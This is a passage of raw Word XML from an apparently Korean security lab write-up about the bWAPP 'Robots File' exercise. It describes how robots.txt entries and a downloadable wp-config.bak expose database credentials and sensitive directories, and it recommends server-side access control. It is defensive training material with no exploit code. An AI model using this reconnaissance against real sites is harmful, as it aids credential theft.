      </w:r>
    </w:p>
    <w:p w14:paraId="3E578728" w14:textId="79EB4CA5" w:rsidR="00B9373F" w:rsidRDefault="00B779A6" w:rsidP="00B9373F">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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A197E1" wp14:editId="2F359509">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>545406</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1743848</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2117112" cy="188419"/>
                <wp:effectExtent l="19050" t="19050" r="16510" b="2159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112" cy="1884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653D0" id="직사각형 97" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:42.95pt;margin-top:137.3pt;width:166.7pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr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698B18" wp14:editId="0F0643FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1566545</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>429324</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344706" cy="169049"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="95" name="직사각형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706" cy="1690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05870" id="직사각형 95" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:123.35pt;margin-top:33.8pt;width:105.9pt;height:13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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00052489" w:rsidRPr="00052489">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="427079AA" wp14:editId="34CB8269">
            <wp:extent cx="5760000" cy="2504508"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="10160"/>
            <wp:docPr id="89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838037C-1705-4B9F-BD08-F9871AAE5B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838037C-1705-4B9F-BD08-F9871AAE5B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04508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8F4FD2" w14:textId="430C9FB4" w:rsidR="00052489" w:rsidRDefault="00052489" w:rsidP="00052489">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p-config.bak </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>파일 다운로드 후 열람하면 다음 그림과 같이 데이터베이스 접속 정보가 평문</w:t>
      </w:r>
      <w:r w:rsidR="00B9373F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>으</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>로 노출된다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">이는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">robots.txt. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>파일이 구글 검색을 회피하기 위한 목적으로 이용되지만,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">잘못 사용하면 중요 정보가 노출될 수 </w:t>
      </w:r>
      <w:r w:rsidR="00755E32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>있</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>다는 예시다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351BF119" w14:textId="68B79A06" w:rsidR="00B9373F" w:rsidRDefault="00377BF4" w:rsidP="00A75376">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="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113986B" wp14:editId="6B5B2CBC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-49946</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-288152</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6884894" cy="10304289"/>
                <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                <wp:wrapNone/>
                <wp:docPr id="87" name="직사각형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894" cy="103042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2B498" id="직사각형 87" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3.95pt;margin-top:-22.7pt;width:542.1pt;height:811.35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  <w:r w:rsidRPr="00052489">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22857C6E" wp14:editId="29BC9080">
            <wp:extent cx="5760000" cy="3587755"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="12700"/>
            <wp:docPr id="90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3459033B-BEAD-4479-9864-8B91F158018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3459033B-BEAD-4479-9864-8B91F158018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87755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69CC25A" w14:textId="77777777" w:rsidR="00A75376" w:rsidRDefault="00A75376" w:rsidP="00A75376">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0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D46589" w:rsidRPr="00382A60" w14:paraId="4E766AE3" w14:textId="77777777" w:rsidTr="00B24BB3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0FA52B2F" w14:textId="4929C192" w:rsidR="00D46589" w:rsidRPr="00382A60" w:rsidRDefault="00D46589" w:rsidP="00D46589">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="400"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">공격 레벨 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">high </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">공격과정 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D5F0CC" w14:textId="37F513FD" w:rsidR="00D46589" w:rsidRPr="00382A60" w:rsidRDefault="00D46589" w:rsidP="00D46589">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E83B45F" w14:textId="708C0623" w:rsidR="00D46589" w:rsidRPr="00382A60" w:rsidRDefault="00D46589" w:rsidP="00D46589">
      <w:pPr>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">obots File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DABA0CB" w14:textId="567143E6" w:rsidR="00D46589" w:rsidRDefault="00D46589" w:rsidP="00D46589">
      <w:pPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>igh</w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5246C41E" w14:textId="06D114CF" w:rsidR="00D46589" w:rsidRDefault="00B779A6" w:rsidP="00D46589">
      <w:pPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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6CDE43" wp14:editId="7A601D14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4324350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>835596</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1563861" cy="365152"/>
                <wp:effectExtent l="19050" t="19050" r="17780" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="103" name="직사각형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861" cy="3651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6A938" id="직사각형 103" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:340.5pt;margin-top:65.8pt;width:123.15pt;height:2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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr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25F15C" wp14:editId="6F04E063">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4325951</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>645544</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1625333" cy="149999"/>
                <wp:effectExtent l="19050" t="19050" r="13335" b="2159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333" cy="1499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21DDC" id="직사각형 102" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:340.65pt;margin-top:50.85pt;width:128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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr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6BFD70" wp14:editId="35087F8A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1774852</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>307447</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1640701" cy="165367"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="254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701" cy="1653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522DD" id="직사각형 101" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:139.75pt;margin-top:24.2pt;width:129.2pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D46589" w:rsidRPr="00D46589">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15EFE888" wp14:editId="37F55D0B">
            <wp:extent cx="5760000" cy="1308741"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="24765"/>
            <wp:docPr id="92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D4EFC0FC-0904-45E9-BB51-CFFEF7A245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D4EFC0FC-0904-45E9-BB51-CFFEF7A245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08741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58D48D" w14:textId="6147F4DE" w:rsidR="00CB1D8E" w:rsidRDefault="00377BF4" w:rsidP="00377BF4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WAPP ‘robots.txt’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>파일 내용 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078B7E7B" w14:textId="54488C37" w:rsidR="00377BF4" w:rsidRDefault="00B779A6" w:rsidP="002D35C4">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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37EEDF" wp14:editId="1B76D603">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>846834</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1194174</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1344706" cy="656068"/>
                <wp:effectExtent l="19050" t="19050" r="27305" b="10795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706" cy="6560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24242" id="직사각형 104" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:66.7pt;margin-top:94.05pt;width:105.9pt;height:51.6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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00377BF4" w:rsidRPr="00377BF4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0670283A" wp14:editId="3F4BD4A5">
            <wp:extent cx="2977723" cy="2016760"/>
            <wp:effectExtent l="19050" t="19050" r="13335" b="21590"/>
            <wp:docPr id="93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6353746C-3A2F-47F0-BA9F-C02F40A64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6353746C-3A2F-47F0-BA9F-C02F40A64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09102" cy="2038013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FB2FF6" w14:textId="59C2F96D" w:rsidR="00A75376" w:rsidRPr="00735B05" w:rsidRDefault="00377BF4" w:rsidP="00735B05">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 중요한 정보가 포함된 디렉터리인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/admin/, /passwords/, /documents/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00377BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">디렉터리를 </w:t>
      </w:r>
      <w:r w:rsidRPr="00377BF4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00377BF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>에서 제거하라고 표시되어 있다</w:t>
      </w:r>
      <w:r w:rsidR="00735B05">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162244B8" w14:textId="7CBACBAB" w:rsidR="00A75376" w:rsidRPr="00B779A6" w:rsidRDefault="00A75376" w:rsidP="00A75376">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>즉</w:t>
      </w:r>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>디렉터리의 접근 권한 및 웹 애플리케이션 대응방안을 적용하여 기본적인 대응을 먼저 한 후에 마케팅을 고려하여 추가 방안을 적용해야 한다.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FFC93" w14:textId="6ABDA9CD" w:rsidR="00A75376" w:rsidRPr="00B779A6" w:rsidRDefault="00A75376" w:rsidP="00A75376">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>또한</w:t>
      </w:r>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">, robots.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00B779A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>파일 이전에 중요한 디렉터리는 서버단에서 접근을 제어하는 것이 올바른 보안 설정이</w:t>
      </w:r>
      <w:r w:rsidR="00735B05" w:rsidRPr="00B779A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>라고 볼 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00735B05" w:rsidRPr="00B779A6">
        <w:rPr>
          <w:b/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546D9770" w14:textId="77777777" w:rsidR="00377BF4" w:rsidRPr="00A75376" w:rsidRDefault="00377BF4" w:rsidP="00A75376">
      <w:pPr>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474AAAEC" w14:textId="77777777" w:rsidR="00377BF4" w:rsidRPr="00377BF4" w:rsidRDefault="00377BF4" w:rsidP="00377BF4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="760"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="323EB560" w14:textId="33791FD7" w:rsidR="00B9373F" w:rsidRPr="00D46589" w:rsidRDefault="00B9373F" w:rsidP="00052489">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4950A176" w14:textId="77777777" w:rsidR="00B9373F" w:rsidRPr="00052489" w:rsidRDefault="00B9373F" w:rsidP="00052489">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B22E5E3" w14:textId="77777777" w:rsidR="00052489" w:rsidRPr="00FA6099" w:rsidRDefault="00052489" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B1FE40A" w14:textId="323A9BB2" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1F73EB" w14:textId="77777777" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5D0C21" w14:textId="77777777" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:left="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447A48CC" w14:textId="762757A9" w:rsidR="00CC3B11" w:rsidRDefault="00A8495D" w:rsidP="00CC3B11">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AF3C4" w14:textId="624697DE" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00CC3B11">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493D0E8B" w14:textId="4663BDBE" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00CC3B11">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B72F44B" w14:textId="0412CC06" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00CC3B11">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CED39F" w14:textId="38FCE41E" w:rsidR="00CC3B11" w:rsidRDefault="00CC3B11" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C8211F" w14:textId="10AB9461" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21681938" w14:textId="319C33DD" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507E79CE" w14:textId="1F13A97B" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50599EC3" w14:textId="192C78D5" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A243C9F" w14:textId="3B369746" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38562768" w14:textId="5C32857D" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1937FBE8" w14:textId="13C7B18D" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF31F86" w14:textId="000D4574" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182E2AAA" w14:textId="3E278617" w:rsidR="00DA2D7E" w:rsidRDefault="00DA2D7E" w:rsidP="00576B37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
